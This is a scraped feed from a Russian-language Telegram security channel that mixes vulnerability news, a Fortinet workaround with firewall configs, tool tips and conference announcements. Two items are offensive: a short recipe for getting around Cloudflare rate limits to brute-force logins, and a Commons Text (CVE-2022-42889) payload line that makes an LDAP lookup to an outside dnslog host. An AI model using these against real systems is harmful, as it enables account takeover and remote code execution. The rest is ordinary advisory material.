SecuriXy.kz
9.31K subscribers
483 photos
22 videos
18 files
393 links
Все самое интересное из мира информ. безопасности и IT 👍🏻
Обсуждаем, делимся, умнеем
https://securixy.kz

Обратная связь - @feedback_securixy_bot

Хахатушки - @memekatz
Hack the Box RUS - @HTB_RUS
Download Telegram
Forwarded from Ralf Hacker Channel (Ralf Hacker)
Книга - дело хорошее.
[https://cocomelonc.github.io/book/2022/07/16/mybook.html]
#Bypass #Cloudflare Rate Limit 2022

1. Go to login page
2. Enter credentials
3. Send request to intruder
4. Set change position for host header
5. Set change position for password
6. Enjoy brute forcing
tg_image_219355491.jpeg
194.6 KB
Cyber Security Wheel
Некий наглядный индикатор зрелости компаний к ИБ и собственной защите…
Перевели официальный FAQ MITRE ATT&CK

(финализировали все формулировки)

Перевод опубликован в статье на Хабр и в разделе Вопросы и ответы на сайте сообщества.

Переводили

Антон Шипулин, сооснователь RUSCADASEC
Олег Скулкин, Руководитель лаборатории цифровой криминалистики и исследования вредоносного кода Group-IB
Илья Енин, SOC Analyst Team Lead, Kaspersky Lab
Ольга Моск, редактор, переводчик, менеджер проектов Positive Technologies
Евгений Зудилин
Даниил Югославский, волонтер Russians for Ukraine

Архив

Оригинальные сообщения доступны в дискуссионной комнате. Веб-версия обсуждения сохранена для индексации поисковыми системами. Zip-архив обсуждения сохранен для обеспечения целостности (неизменности), которая гарантируется хеш-функцией SHA-256:

$ shasum -a 256 archive/dc_4.zip
4b350895f49ffd77018d75e71e83115142b3c7240f80334c2ba4cdb596f7d49c archive/dc_4.zip


📩 Подписаться 📩
Forwarded from Sys-Admin InfoSec
Open SysConf'22 - Сети, Ansible шаблонизация и не только
 
До нашей встречи на Open SysConf в г.Алматы осталось практически 10 дней и я рад презентовать Вам финальные темы докладов:

Сети (хуети) в современном датацентре
- Автор: Айдар Оспанбеков. Архитектор облака PS.kz.
- Краткое описание: С какими проблемами мы столкнулись при эксплуатации сети в публичном облаке; Как и для чего мы отказывались от VLAN в пользу VxLAN; Как строили сеть по топологии spine-leaf с BGP и FRRouting

Шаблонизация Linux систем в организациях
- Автор: Нурбиби "R0b0Cat". Системный администратор.
- Краткое описание: Доклад для тех кому нужно произвести в единый формат linux дистрибутивы в организации

Неявный превентинг констракшн
- Автор: Yevgeniy "sysadminkz". Sys-Adm.in
- Краткое описание: Неявный превентинг - такого термина в интернете не нашел, поэтому расскажу о том, как я вижу defencive подход с позиции неявной превентивной защиты. Создадим новый термин и его понимание прямо в реалтайме ✌️

Голова чтобы думать, ноги чтобы ходить - приходи на Open SysConf 14 октября в SmartPoint, г.Алматы.

Детали на сайте: https://sysconf.io
 
https://tttttt.me/in6uz?livestream
Стрим обзор сканера уязвимостей сетевых протоколов Above
https://github.com/in9uz/Above
Forwarded from Devious Methods
🚨Fortinet предлагает workaround в статье и я ее перевел на свой лад

Summary (Описание):

ПОЛНАЯ ЖОПА… Это обход аутентификации в веб интерфейсе. Хакерам достаточно отправить один PUT запрос чтобы добавить ключ ssh пользователю admin.

Exploitation Status (Статус эксплуатации):

Искать в логах IoC:

user=«Local_Process_Acess»

Workaround (Заплатка на жопу):

FortiOS:

Отключить нахуй HTTP/HTTPS интерфейс админа!

Настроить access list:

config firewall address

edit "my_allowed_addresses"

set subnet <MY IP> <MY SUBNET>

end


Создать Address Group:

config firewall addrgrp

edit "MGMT_IPs"

set member "my_allowed_addresses"

end



Создать Local-in политику для разрешения доступа к менеджмент интерфейсу (пример: port1) только для определенной группы:

config firewall local-in-policy

edit 1

set intf port1

set srcaddr "MGMT_IPs"

set dstaddr "all"

set action accept

set service HTTPS HTTP

set schedule "always"

set status enable

next

edit 2

set intf "any"

set srcaddr "all"

set dstaddr "all"

set action deny

set service HTTPS HTTP

set schedule "always"

set status enable

end


FortiProxy:

Отключить нахуй HTTP/HTTPS интерфейс админа!

Настроить access list для доступа к порту 1:

config system interface

edit port1

set dedicated-to management

set trust-ip-1 <MY IP> <MY SUBNET>

end


FortiSwitchManager:

Отключить нахуй HTTP/HTTPS интерфейс админа!

Affected Products (Продукты подавшие под раздачу)
FortiOS versions 5.x, 6.x are NOT impacted.
FortiOS version 7.2.0 through 7.2.1
FortiOS version 7.0.0 through 7.0.6
FortiProxy version 7.2.0
FortiProxy version 7.0.0 through 7.0.6
FortiSwitchManager version 7.2.0
FortiSwitchManager version 7.0.0

Solutions (Сделайте апргрейд ОС ASAP)
Please upgrade to FortiOS version 7.2.2 or above
Please upgrade to FortiOS version 7.0.7 or above
Please upgrade to FortiProxy version 7.2.1 or above
Please upgrade to FortiProxy version 7.0.7 or above
Please upgrade to FortiSwitchManager version 7.2.1 or above
Срочно обновлять офис…

Microsoft Word Remote Code Execution Vulnerability CVE-2022-41031 (https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-41031) and Microsoft Office Graphics Remote Code Execution Vulnerability CVE-2022-38049 (https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-38049)

#MSOffice #RCE #CVE
#CVE-2022-42889 #Apache #RCE #4Shell

Обнаружена критическая уязвимость в программном обеспечении Apache (CVE-2022-42889) именуемая 4Shell
CVE-ID: CVE-2022-42889
CVSS Score: 9.8
Дата публикации сведений об уязвимости: 17.10.2022
Уязвимые программные продукты:
• JDK 1.8.0_341
• JDK version 9.0-16.0
Рекомендации по устранению уязвимости:
В кратчайшие сроки обновить версию уязвимой библиотеки до актуальной.

Дополнительные материалы:
https://www.rapid7.com/blog/post/2022/10/17/cve-2022-42889-keep-calm-and-stop-saying-4shell/

---
Payload:
jxPathContext.getValue("javax.naming.InitialContext.doLookup(\"ldap://check.dnslog.cn/obj\")");
SecuriXy.kz
#CVE-2022-42889 #Apache #RCE #4Shell Обнаружена критическая уязвимость в программном обеспечении Apache (CVE-2022-42889) именуемая 4Shell CVE-ID: CVE-2022-42889 CVSS Score: 9.8 Дата публикации сведений об уязвимости: 17.10.2022 Уязвимые программные продукты:…
Check with ansible:
- hosts: CHANGEME
become: yes
become_user: CHANGEME
tasks:
- name: Check if java is installed
command: java -version
register: java_result
ignore_errors: True

- debug:
msg: "Failed - Java is not installed"
when: java_result is failed

- debug:
msg: "Success - installed Java version: {{ java_result }}"
when: java_result is success
OpenSSL 3.0.7 is a security-fix release. The highest severity issue fixed in this release is CRITICAL (from 2016)

https://mta.openssl.org/pipermail/openssl-announce/2022-October/000238.html
Друзья, специально для вас, мы выложили запись докладов с большой сцены на наш YouTube-канал!

Вспомним еще раз, как это было!

DAY 1: GOVERNMENT AND BUSINESS DAY
https://youtu.be/Z5mVjVtRv5k

DAY 2: SECURE CODING/DEVELOPMENT DAY
https://youtu.be/xbbzEDE3mns

DAY 3: HACK DAY
https://youtu.be/XTBpW2kCjAM

Приятного просмотра!
Не забывайте подписываться на наш канал и ставить лайки🔥
ReNgine is a very complete recon tool that can be very helpful to centralize all your recon in one site.

Its main website defines it as: «The only web application recon tool you will ever need!«

Currently is capable of performing:
* Subdomain Discovery
* Vulnerability Detection
* IPs and Open Ports Identification
* Directory and files fuzzing
* Screenshot Gathering
* Endpoints Gathering
* OSINT

Отличная вещь, оч рекомендую

https://github.com/yogeshojha/rengine
https://cvetrends.com

Позволяет мониторить тенденций CVE в режиме реального времени. Агрегация информации: из Twitter, NIST NVD, Reddit и GitHub.

Рекомендую добавить во вкладку инструментария аналитика SOC либо выводит сразу на экран.
#Автоматизация рутинной работы

В дополнение к сервису выше,
Если Вам нужно переодически проверять наличие публично доступных POC для CVE и искать их руками по интернет-ресурсам это не по админски - просто добавьте симлинки на команды в ~/.bashrc или ~/.zshrc и затем обновите `source ~/.zshrc` :

//Эта выдаст всю информацию по конкретному CVE
Использовать как cve CVE-2022-42889

cve() {curl "https://poc-in-github.motikan2010.net/api/v1/?cve_id=$1" | jq '.pocs[]'}


//Эта выведет линки на гит репозитории с нужным CVE
cve_url CVE-2022-42889

cve_url() {curl "https://poc-in-github.motikan2010.net/api/v1/?cve_id=$1" | jq '.pocs[] | .html_url'}